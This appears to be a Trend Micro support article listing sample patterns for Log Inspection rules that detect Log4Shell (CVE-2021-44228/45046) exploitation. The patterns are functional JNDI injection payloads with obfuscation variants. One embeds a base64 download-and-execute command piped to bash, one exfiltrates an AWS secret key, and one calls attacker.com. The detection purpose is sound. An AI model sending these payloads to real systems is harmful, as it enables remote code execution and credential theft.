Custom Log Inspection Rules for Log4Shell Vulnerability on Trend Micro Cloud One - Workload Security and Deep Security

    • Updated: 17 Dec 2021
    • Product/Version: Cloud One - Workload Security; Deep Security 20.0
    • Platform:
Summary
The following article covers custom Trend Micro Cloud One - Workload Security and Deep Security Log Inspection (LI) rules that may help investigate potential activity associated with the Log4Shell vulnerability (CVE-2021-44228 and CVE-2021-45046).

Trend Micro's mainline protection article can be found here.
 
Details
A custom LI rule can be created to detect these patterns, as well as similar ones discovered in the future. Users may follow the steps located at Define a Log Inspection rule for use in policies - Workload Security | Trend Micro Cloud One™ Documentation and add the following sample patterns in the pattern-matching field:

1. ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==}
2. ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
3. ${${lower:jn}di:ldap://172.31.39.127:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}
4. ${${l${lower:ow}er:j}ndi:ldap://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
5. ${jndi${lower::}ldap:${lower:/}/172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
6. ${jndi${lower::${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}}ldap:${lower:/}/172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
7. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
8. ${jndi:ldap://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
9. ${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
10. ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
11. ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
12. ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:dn}${lower:s}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
13. ${${::-j}ndi:rmi://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
14. ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:iio}${lower:p}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
15. ${${lower:jndi}:${lower:rmi}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
16. ${jndi:ldap://172.31.39.127:1399/path/${env:aws_secret_key}}
17. ${${::-j}ndi:rmi://attacker.com/poc}
Category:
Remove a Malware / Virus
Solution Id:
000289992